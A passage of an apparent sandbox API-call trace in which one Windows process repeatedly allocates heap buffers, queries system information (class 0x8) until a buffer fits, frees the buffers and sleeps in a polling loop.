SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0282.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0282.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0282.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0282.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0282.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0282.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0282.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.396] Sleep (dwMilliseconds=0x110) [0282.403] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0282.403] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0282.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0282.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0282.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0282.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0282.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0282.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0282.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.410] Sleep (dwMilliseconds=0x110) [0282.421] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0282.421] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0282.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0282.422] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0282.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0282.423] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0282.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0282.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0282.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.425] Sleep (dwMilliseconds=0x110) [0282.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0282.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0282.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0282.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0282.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0282.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0282.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0282.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0282.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.443] Sleep (dwMilliseconds=0x110) [0282.463] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0282.463] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.464] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0282.464] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0282.464] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.465] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0282.465] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0282.465] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.465] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0282.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0282.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.466] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0282.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.467] Sleep (dwMilliseconds=0x110) [0282.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0282.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0282.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0282.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0282.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0282.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0282.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0282.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0282.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.491] Sleep (dwMilliseconds=0x110) [0282.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0282.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0282.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0282.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0282.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0282.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0282.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0282.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0282.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.505] Sleep (dwMilliseconds=0x110) [0282.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0282.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0282.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0282.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0282.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0282.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0282.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0282.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0282.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.520] Sleep (dwMilliseconds=0x110) [0282.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0282.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0282.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0282.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0282.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0282.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0282.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0282.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0282.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.535] Sleep (dwMilliseconds=0x110) [0282.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0282.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0282.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0282.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0282.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0282.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0282.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0282.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0282.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.553] Sleep (dwMilliseconds=0x110) [0282.559] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0282.559] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0282.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0282.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0282.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0282.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0282.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0282.567] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0282.568] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.569] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.569] Sleep (dwMilliseconds=0x110) [0282.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0282.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0282.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0282.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0282.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0282.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0282.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0282.584] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0282.585] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.585] Sleep (dwMilliseconds=0x110) [0282.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0282.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0282.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0282.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0282.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0282.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0282.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0282.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0282.602] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.603] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.603] Sleep (dwMilliseconds=0x110) [0282.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0282.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0282.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0282.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0282.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0282.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0282.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0282.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0282.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.611] Sleep (dwMilliseconds=0x110) [0282.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 